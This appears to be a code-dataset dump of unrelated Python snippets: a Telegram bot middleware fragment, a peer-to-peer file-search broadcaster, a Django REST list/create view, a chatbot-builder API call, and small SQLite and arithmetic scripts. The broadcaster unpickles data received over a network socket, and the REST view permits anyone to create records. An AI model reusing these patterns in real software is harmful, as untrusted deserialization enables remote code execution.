chat = await Chat.get(chat_id)
if not chat:
chat = await dbc.add_new_chat(tg_chat)
data["user"] = user
data["chat"] = chat
async def on_pre_process_message(self, message: types.Message, data: dict):
await self.setup_chat(data, message.from_user, message.chat)
async def on_pre_process_callback_query(self, query: types.CallbackQuery, data: dict):
await self.setup_chat(data, query.from_user, query.message.chat if query.message else None)
|
993,594 | 453c590063d3a417b02f59c307b059e41ccb0e23 | import socket
import sys
import pickle
from time import sleep
from queue import Queue
from _thread import *
import threading
from threading import Thread
sys.path.append('.\\LinearTopology')
import GLOBALS
import classes
import utility
response = [[]]
num = 0
def addMessage():
"""Initializes the Reponse list to make sure no old responses were left in it.
Args:
None
Returns:
None
Globals:
response - List to store the responses from the other Super Peers.
Calls:
None
Called by:
broadcastMsg
"""
tmp = [[] for x in GLOBALS.SUPER_PEER_LIST]
global response
global num
if num != 0:
response.append([])
for x in GLOBALS.SUPER_PEER_LIST:
response[num].append(tmp)
num +=1
def broadcastThread(filename, response, id, index):
"""Sends a message to all other Super Peers.
Args:
filename (Str) - The name of the file to be searched for.
response (List) - List that will store all of the responses form the super peers.
id (int) - Then index for the list to put all of the data in
index (Int) - The index of response to store the answer from the Super Peer in.
Returns:
A list of leaf nodes that have a the file.
Globals:
Calls:
Called by:
broadcastMsg()
"""
ip = GLOBALS.SUPER_PEER_LIST[index][1]
port = int(GLOBALS.SUPER_PEER_LIST[index][2])
try:
sock = socket.socket()
sock.connect((ip, port))
msg = pickle.dumps(filename)
sock.send(msg)
data = sock.recv(1024)
data = pickle.loads(data)
print("[info] Broadcast lib: Response from Super Peer: " + str(index) + " : " + str(data))
response[id][index] = data
except socket.error as err:
print("[ERROR] Broadcast lib: Error connecting " + str(ip) + ":" + str(port))
sock.close()
return
def broadcastMsg(filename):
"""Spawns threads to handle messaging the other Super Peers.
Args:
filename (Str) - the name of the file to be searched for.
Returns:
A list of leaf nodes that have a the file.
Globals:
response - List that will store all of the responses form the super peers.
Calls:
addMessage()
broadcastThread()
Called by:
superPeer.broadcastSearch()
"""
threads = []
GLOBALS.BROADCAST_STATUS = 1
global num
id = num
global response
addMessage()
for x in range(len(GLOBALS.SUPER_PEER_LIST)):
if x == GLOBALS.SUPER_PEER_ID:
continue
proc = Thread(target = broadcastThread, args = [filename, response, id, x])
proc.start()
threads.append(proc)
#print("[info] Broadcast lib: All threads created")
for proc in threads:
proc.join()
GLOBALS.BROADCAST_STATUS = 0
return response[id]
|
993,595 | 756ef23ad9664cec94fe3b80aab66f7e6fca77a4 | from rest_framework import generics
from addons.models import AddOn
from .serializers import AddOnSerializer
from rest_framework.permissions import AllowAny
class AddonsAPIView(generics.ListCreateAPIView):
permission_classes = [AllowAny]
serializer_class = AddOnSerializer
queryset = AddOn.objects.all() |
993,596 | 15cbbe9e8c232b5b545207a9ccc606ed727e63d5 | import requests
import json, os
url = "{0}:{1}".format(os.environ['HOSTNAME'] , "8989")
resp = requests.post('http://' + url + '/api/v1/type/service/botbuilder/',
json={
"cb_id" : "cb0001",
"chat_cate" : "EP",
"chat_sub_cate" : "people",
"cb_title" : "chatbot",
"cb_desc" : "find_people",
"creation_date": "2017-05-22T18:00:00.000",
"last_update_date": "2017-05-22T18:00:00.000",
"created_by" : "KSS",
"last_updated_by" : "KSS",
#Model List
"cb_id": "cb0001",
"nn_id": "lstmcrf0002", #wcnn_ksw01
'nn_purpose': "NER", # Intend ADD
'nn_type': "bilstmcrf",
'nn_label_data': {"entity": ["이름", "직급", "직책", "근태코드", "그룹", "근무조", "업무", "날짜", "장소"]},
'nn_desc': "ner",
#intent
"cb_id": "cb0001",
"intent_id": "1",
"intent_type": "model",
"intent_desc": "",
"rule_value": {"key": ["알려줘"]},
"nn_type": "Seq2Seq",
# #story
# 'story_id' : "1",
# 'story_desc' : "find_tel",
#entity
"cb_id": "cb0001",
"intent_id": "1",
'entity_type' : "key", #(custom/essential/response/default/key)
'entity_list' : {"key": ["이름", "직급", "직책", "근태코드", "그룹", "근무조", "업무", "날짜", "장소"]},
# entity
# "cb_id": "cb0001",
# "intent_id": "1",
# 'story_id': "1",
# 'entity_type': "essential", # (custom/essential/response/default/key)
# 'entity_list': {"essential": ["이름"]},
# # entity
# "cb_id": "cb0001",
# "intent_id": "1",
# 'story_id': "1",
# 'entity_type': "key_values", # (custom/essential/response/default/key)
# 'entity_list': {"장소": ["센터", "판교", "포항", "광양"], "직급": ["사원", "대리", "과장", "차장", "부장", "팀장", "사업부장", "상사", "리더"]},
#tagging
"cb_id": "cb0001",
"pos_type": "mecab",
"proper_noun": {"tagwc": [1, "/hoya_model_root/chatbot/wc.txt", False], "tagceo": [1, "/hoya_model_root/chatbot/ceo.txt", False], "tagloc": [1, "/hoya_model_root/chatbot/loc.txt", False], "tagorg": [1, "/hoya_model_root/chatbot/org.txt", False], "tagrot": [1, "/hoya_model_root/chatbot/rot.txt", False], "tagdate": [4, "/hoya_model_root/chatbot/super.txt", False], "taghead": [1, "/hoya_model_root/chatbot/head.txt", False], "tagname": [2, "/hoya_model_root/chatbot/name.txt", False], "tagrank": [1, "/hoya_model_root/chatbot/rank.txt", False], "tagcompany": [2, "/hoya_model_root/chatbot/company.txt", False]},
#entity relation
"cb_id": "cb0001",
"entity_id" : "tagname",
"entity_uuid" : "asdf",
"entity_desc" : "이름",
})
data = json.loads(resp.json())
print("evaluation result : {0}".format(data))
|
993,597 | 289af8ae66f0734d44845e8cd84e1d36867428b8 | ii = [('MartHSI2.py', 1), ('WadeJEB.py', 1), ('NewmJLP.py', 1), ('KirbWPW2.py', 1), ('BachARE.py', 2), ('MartHRW.py', 1), ('BabbCRD.py', 2), ('WilbRLW3.py', 1), ('MartHRW2.py', 1), ('ChalTPW.py', 1), ('KeigTSS.py', 1), ('WaylFEP.py', 3), ('BentJDO.py', 1)] |
993,598 | f1625fcd4ede43241c44d4e4d6295b958e7111c5 | import sqlite3
import os
#
# class Blob:
# """Automatically encode a binary string."""
# def __init__(self, s):
# self.s = s
#
# def _quote(self):
# return "'%s'" % sqlite3.encode(self.s)
path = '/home/ju/JetBrainsProjects/PycharmProjects/hilar/hilar/src/data/beige2_hat.jpeg'
with open(path, 'rb') as f:
backDrop=sqlite3.Binary(f.read())
id=1
original_title="beige2 hat"
overview ='look at a beige hat'
vote_average=1
category = 'hat'
trending = 1
watched=1
connection = sqlite3.connect("/home/ju/JetBrainsProjects/PycharmProjects/hilar/hilar/db/database.db")
cursor = connection.cursor()
cursor.execute('insert into Product (id, original_title, overview,vote_average,backDrop, category, trending, watched) '
'values (?,?,?,?,?,?,?,?)', (id, original_title, overview, vote_average,backDrop, category, trending, watched))
connection.commit()
|
993,599 | 4bb3e02374cd196187adcc4a7976c44cb7bdb5ed | a=3
b=4
c=1000000007
d=(3*3*3*3)%c
print d
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.